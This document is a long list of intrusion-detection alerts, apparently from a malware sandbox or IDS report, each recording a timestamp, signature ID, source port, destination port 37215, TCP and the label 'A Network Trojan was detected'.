              Timestamp:06/13/24-21:32:36.247148
              SID:2829579
              Source Port:37542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989586
              SID:2835222
              Source Port:58142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697027
              SID:2835222
              Source Port:55724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707331
              SID:2835222
              Source Port:53132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026943
              SID:2829579
              Source Port:51030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546659
              SID:2829579
              Source Port:56722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486976
              SID:2829579
              Source Port:41944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755597
              SID:2835222
              Source Port:48458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097507
              SID:2835222
              Source Port:59030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307392
              SID:2835222
              Source Port:60842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221544
              SID:2835222
              Source Port:45248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349188
              SID:2835222
              Source Port:33004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675208
              SID:2829579
              Source Port:59768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123925
              SID:2829579
              Source Port:56048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345146
              SID:2835222
              Source Port:36288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502060
              SID:2829579
              Source Port:60952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996660
              SID:2835222
              Source Port:57336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079711
              SID:2829579
              Source Port:47674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.933902
              SID:2835222
              Source Port:47884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175131
              SID:2835222
              Source Port:34484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800600
              SID:2829579
              Source Port:39242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416757
              SID:2835222
              Source Port:49064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210542
              SID:2829579
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677156
              SID:2835222
              Source Port:41836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238034
              SID:2835222
              Source Port:37180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990705
              SID:2835222
              Source Port:52012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505652
              SID:2829579
              Source Port:38622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610797
              SID:2829579
              Source Port:45892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835181
              SID:2835222
              Source Port:38210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306558
              SID:2835222
              Source Port:42764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630211
              SID:2829579
              Source Port:48558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093818
              SID:2835222
              Source Port:48654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297440
              SID:2835222
              Source Port:36062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678607
              SID:2835222
              Source Port:41894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131126
              SID:2829579
              Source Port:42664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844076
              SID:2829579
              Source Port:33092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275680
              SID:2829579
              Source Port:50652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073932
              SID:2835222
              Source Port:42746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042279
              SID:2829579
              Source Port:58496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407702
              SID:2829579
              Source Port:56510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.226899
              SID:2835222
              Source Port:42510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418205
              SID:2835222
              Source Port:50572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422189
              SID:2829579
              Source Port:43090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.489024
              SID:2829579
              Source Port:54622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354023
              SID:2835222
              Source Port:45384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247827
              SID:2829579
              Source Port:46992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153071
              SID:2835222
              Source Port:59854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297522
              SID:2835222
              Source Port:48678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821993
              SID:2829579
              Source Port:49680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830689
              SID:2829579
              Source Port:55202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376332
              SID:2835222
              Source Port:51876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211714
              SID:2829579
              Source Port:36546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253499
              SID:2835222
              Source Port:37302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043184
              SID:2835222
              Source Port:34116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223382
              SID:2835222
              Source Port:48834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726925
              SID:2829579
              Source Port:39014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091597
              SID:2829579
              Source Port:34148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455690
              SID:2835222
              Source Port:35672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909644
              SID:2829579
              Source Port:50866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938151
              SID:2829579
              Source Port:41830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221764
              SID:2829579
              Source Port:40218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268871
              SID:2829579
              Source Port:48688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423274
              SID:2835222
              Source Port:48370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787976
              SID:2829579
              Source Port:51218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440403
              SID:2829579
              Source Port:37062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164532
              SID:2829579
              Source Port:47596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244019
              SID:2829579
              Source Port:38134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474165
              SID:2829579
              Source Port:36032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090814
              SID:2829579
              Source Port:49682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910246
              SID:2829579
              Source Port:34692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228553
              SID:2829579
              Source Port:36180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127966
              SID:2829579
              Source Port:47976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406980
              SID:2829579
              Source Port:35208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635232
              SID:2835222
              Source Port:52876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727629
              SID:2835222
              Source Port:40520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339777
              SID:2835222
              Source Port:41556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401827
              SID:2835222
              Source Port:48462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128898
              SID:2835222
              Source Port:50400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630237
              SID:2835222
              Source Port:34144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834722
              SID:2835222
              Source Port:50986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477088
              SID:2835222
              Source Port:34522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887608
              SID:2829579
              Source Port:54812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130285
              SID:2835222
              Source Port:33532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198903
              SID:2829579
              Source Port:60334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569230
              SID:2829579
              Source Port:51302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452161
              SID:2829579
              Source Port:47538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275870
              SID:2835222
              Source Port:42116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801657
              SID:2829579
              Source Port:40902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938022
              SID:2835222
              Source Port:50614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404070
              SID:2835222
              Source Port:50466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154606
              SID:2829579
              Source Port:58054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474990
              SID:2829579
              Source Port:37644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451807
              SID:2829579
              Source Port:34352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194748
              SID:2835222
              Source Port:35204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055983
              SID:2829579
              Source Port:33614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680528
              SID:2829579
              Source Port:42058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243859
              SID:2829579
              Source Port:45276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276140
              SID:2829579
              Source Port:37596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726513
              SID:2829579
              Source Port:52280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368983
              SID:2829579
              Source Port:46318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345419
              SID:2829579
              Source Port:47024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476249
              SID:2829579
              Source Port:55286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223387
              SID:2829579
              Source Port:36544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502018
              SID:2829579
              Source Port:59134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256617
              SID:2829579
              Source Port:58514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088671
              SID:2835222
              Source Port:47748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267764
              SID:2835222
              Source Port:59234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913553
              SID:2829579
              Source Port:59598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227850
              SID:2829579
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130261
              SID:2835222
              Source Port:52406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417839
              SID:2829579
              Source Port:35784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420167
              SID:2835222
              Source Port:51984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751143
              SID:2835222
              Source Port:57738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307055
              SID:2835222
              Source Port:57132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995541
              SID:2829579
              Source Port:33648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995350
              SID:2835222
              Source Port:43918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871282
              SID:2829579
              Source Port:51298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309270
              SID:2835222
              Source Port:41744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658959
              SID:2829579
              Source Port:53276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230897
              SID:2835222
              Source Port:40882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835477
              SID:2829579
              Source Port:54310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241882
              SID:2829579
              Source Port:46964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077294
              SID:2835222
              Source Port:42542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840920
              SID:2835222
              Source Port:41134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107112
              SID:2829579
              Source Port:49664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213019
              SID:2835222
              Source Port:51142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914186
              SID:2835222
              Source Port:35502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672652
              SID:2829579
              Source Port:47932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547164
              SID:2835222
              Source Port:46750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868792
              SID:2835222
              Source Port:37144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476607
              SID:2835222
              Source Port:58322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160535
              SID:2835222
              Source Port:54434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091324
              SID:2835222
              Source Port:58928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240584
              SID:2835222
              Source Port:34268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074830
              SID:2835222
              Source Port:47548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456538
              SID:2829579
              Source Port:36038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440260
              SID:2829579
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194670
              SID:2829579
              Source Port:59546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654924
              SID:2829579
              Source Port:59958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970017
              SID:2835222
              Source Port:60676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048588
              SID:2835222
              Source Port:51302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132744
              SID:2829579
              Source Port:44326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729271
              SID:2829579
              Source Port:49890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270642
              SID:2835222
              Source Port:48258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992652
              SID:2829579
              Source Port:38576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027099
              SID:2835222
              Source Port:43020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451047
              SID:2829579
              Source Port:59834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568127
              SID:2829579
              Source Port:46566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634313
              SID:2835222
              Source Port:53276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436421
              SID:2835222
              Source Port:37944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823357
              SID:2829579
              Source Port:36876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248135
              SID:2829579
              Source Port:33544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321699
              SID:2835222
              Source Port:58364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039415
              SID:2835222
              Source Port:39542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694592
              SID:2835222
              Source Port:57786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669252
              SID:2829579
              Source Port:41734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275209
              SID:2829579
              Source Port:34630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107330
              SID:2829579
              Source Port:51010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554653
              SID:2829579
              Source Port:51450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092356
              SID:2835222
              Source Port:54386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420107
              SID:2829579
              Source Port:34104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079927
              SID:2829579
              Source Port:49134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262789
              SID:2835222
              Source Port:57416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824686
              SID:2835222
              Source Port:34700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724509
              SID:2829579
              Source Port:35648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150244
              SID:2829579
              Source Port:50202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503987
              SID:2829579
              Source Port:48900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710120
              SID:2829579
              Source Port:42300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832038
              SID:2829579
              Source Port:36682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418328
              SID:2835222
              Source Port:59538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154069
              SID:2835222
              Source Port:48202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191233
              SID:2835222
              Source Port:48828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133853
              SID:2829579
              Source Port:40168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347501
              SID:2829579
              Source Port:34578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609004
              SID:2835222
              Source Port:45792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693953
              SID:2829579
              Source Port:50308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091567
              SID:2835222
              Source Port:40540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088446
              SID:2829579
              Source Port:58836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212123
              SID:2829579
              Source Port:57680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348698
              SID:2829579
              Source Port:36584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486380
              SID:2829579
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502640
              SID:2829579
              Source Port:45930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612735
              SID:2829579
              Source Port:40660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972742
              SID:2835222
              Source Port:55652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528289
              SID:2829579
              Source Port:53796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090152
              SID:2829579
              Source Port:56444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166377
              SID:2829579
              Source Port:50744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992052
              SID:2829579
              Source Port:35388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790190
              SID:2835222
              Source Port:55514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273604
              SID:2829579
              Source Port:36604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822738
              SID:2835222
              Source Port:47684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097800
              SID:2829579
              Source Port:57856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401431
              SID:2829579
              Source Port:60224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455794
              SID:2829579
              Source Port:58916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994620
              SID:2829579
              Source Port:39462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276066
              SID:2829579
              Source Port:52806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245758
              SID:2835222
              Source Port:34566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246172
